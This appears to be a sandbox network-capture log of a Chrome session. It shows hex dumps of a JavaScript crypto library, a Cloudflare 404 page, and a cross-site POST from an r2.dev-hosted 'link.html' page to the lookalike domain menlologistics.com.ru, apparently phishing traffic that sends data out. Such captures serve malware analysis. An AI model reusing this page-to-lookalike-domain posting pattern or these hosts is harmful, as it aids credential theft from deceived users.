                                                    2024-07-04 19:06:00 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                    Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                    Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                    Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                    Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                    Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                    Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                    Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                    Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449757104.18.2.354432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:00 UTC651OUTGET /favicon.ico HTTP/1.1
                                                    Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:06:01 UTC180INHTTP/1.1 404 Not Found
                                                    Date: Thu, 04 Jul 2024 19:06:01 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 27150
                                                    Connection: close
                                                    Server: cloudflare
                                                    CF-RAY: 89e163dc7a810f4d-EWR
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 31 20 33 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 32 20 33 73 20 30 2e 36 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                    Data Ascii: teX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-siz
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 34 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 31 34 20 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" >
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 32 2e 36 39 32 20 31 30 2e 32 33 34 37 48 31 32 36 2e 34 30 32 56 32 34 2e 30 33 34 35 48 31 32 32 2e 36 39 32 56 31 30 2e 32 33 34 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 35 2e 36 37 37 35 20 35 37 2e
                                                    Data Ascii: 34C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V10.2347Z" fill="#0055DC" /> <path d="M85.6775 57.
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 33 36 2e 31 37 36 20 31 31 33 2e 32 38 31 20 31 33 36 2e 37 30 34 20 31 31 34 2e 35 35 35 20 31 33 37 2e 36 34 33 20 31 31 35 2e 34 39 34 43 31 33 38 2e 35 38 32 20 31 31 36 2e 34 33 33 20 31 33 39 2e 38 35 36 20 31 31 36 2e 39 36 31 20 31 34 31 2e 31 38 34 20 31 31 36 2e 39 36 31 43 31 34 31 2e 38 34 32 20 31 31 36 2e 39 36 32 20 31 34 32 2e 34 39 34 20 31 31 36 2e 38 33 33 20 31 34 33 2e 31 30 33 20 31 31 36 2e 35 38 32 43 31 34 33 2e 37 31 31 20 31 31 36 2e 33 33 31 20 31 34 34 2e 32 36 34 20 31 31 35 2e 39 36 32 20 31 34 34 2e 37
                                                    Data Ascii: ll="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 116.961C141.842 116.962 142.494 116.833 143.103 116.582C143.711 116.331 144.264 115.962 144.7
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 31 33 2e 38 37 32 43 31 30 34 2e 30 31 38 20 31 31 34 2e 34 38 20 31 30 34 2e 33 38 37 20 31 31 35 2e 30 33 32 20 31 30 34 2e 38 35 33 20 31 31 35 2e 34 39 37 43 31 30 35 2e 33 31 39 20 31 31 35 2e 39 36 32 20 31 30 35 2e 38 37 32 20 31 31 36 2e 33 33 31 20 31 30 36 2e 34 38 31 20 31 31 36 2e 35 38 32 43 31 30 37 2e 30 38 39 20 31 31 36 2e 38 33 33 20 31 30 37 2e 37 34 31 20 31 31 36 2e 39 36 32 20 31 30 38 2e 33 39 39 20 31 31 36 2e 39 36 31 43 31 30 39 2e 37 32 38 20 31 31 36 2e 39 36 31 20 31 31 31 2e 30 30 31 20 31 31 36 2e 34 33
                                                    Data Ascii: h d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 106.481 116.582C107.089 116.833 107.741 116.962 108.399 116.961C109.728 116.961 111.001 116.43
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 38 2e 38 32 31 20 34 38 2e 39 35 31 36 43 31 30 34 2e 30 32 34 20 34 38 2e 39 35 31 36 20 31 30 30 2e 31 33 35 20 34 35 2e 30 36 32 37 20 31 30 30 2e 31 33 35 20 34 30 2e 32 36 35 35 43 31 30 30 2e 31 33 35 20 33 35 2e 34 36 38 34 20 31 30 34 2e 30 32 34 20 33 31 2e 35 37 39 35 20 31 30 38 2e 38 32 31 20 33 31 2e 35 37 39 35 43 31 31 33 2e 36 31 38 20 33 31 2e 35 37 39 35 20 31 31 37 2e 35 30 37 20 33 35
                                                    Data Ascii: 0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.0627 100.135 40.2655C100.135 35.4684 104.024 31.5795 108.821 31.5795C113.618 31.5795 117.507 35
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 34 2e 38 39 31 38 20 31 32 37 2e 35 38 31 48 31 36 34 2e 39 36 37 43 31 37 33 2e 33 34 35 20 31 32 37 2e 35 38 31 20 31 38 30 2e 31 33 37 20 31 33 34 2e 33 37 31 20 31 38 30 2e 31 33 37 20 31 34 32 2e 37 34 37 43 31 38 30 2e 31 33 37 20 31 35 31 2e 31 32 33 20 31 37 33 2e 33 34 35 20 31 35 37 2e 39 31 33 20 31 36 34 2e 39 36 37 20 31 35 37 2e 39 31 33 48 38 34 2e 38 39
                                                    Data Ascii: C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 127.581 180.137 134.371 180.137 142.747C180.137 151.123 173.345 157.913 164.967 157.913H84.89
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 33 38 20 31 34 35 2e 33 39 35 20 31 30 34 2e 30 32 31 20 31 34 37 2e 38 36 39 20 31 30 35 2e 38 30 38 20 31 34 39 2e 37 30 39 43 31 30 37 2e 35 39 35 20 31 35 31 2e 35 34 39 20 31 31 30 2e 30 33 39 20 31 35 32 2e 36 30 33 20 31 31 32 2e 36 30 34 20 31 35 32 2e 36 34 31 43 31 31 35 2e 31 36 38 20 31 35 32 2e 36 30 33 20 31 31 37 2e 36 31 33 20 31 35 31 2e 35 34 39 20 31 31 39 2e 34 20 31 34 39 2e 37 30 39 43 31 32 31 2e 31 38 37 20 31 34 37 2e 38 36 39 20 31 32 32 2e 31 37 20 31 34 35 2e 33 39 35 20 31 32 32 2e 31 33 34 20 31 34 32 2e
                                                    Data Ascii: -mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.
                                                    2024-07-04 19:06:01 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 38 37 2e 30 31 34 31 48 31 34 32 2e 31 37 37 56 39 31 2e 31 30 38 39 48 31 33 37 2e 30 38 37 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 38 37 2e 30 31 34 31 48 31 33 34 2e 39 33 34 56 39 31 2e 31 30 38 39 48 31 32 39 2e 38 35 32 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449758188.114.97.34432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:01 UTC667OUTPOST // HTTP/1.1
                                                    Host: menlologistics.com.ru
                                                    Connection: keep-alive
                                                    Content-Length: 17
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-platform: "Windows"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Content-Type: text/plain;charset=UTF-8
                                                    Accept: */*
                                                    Origin: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/
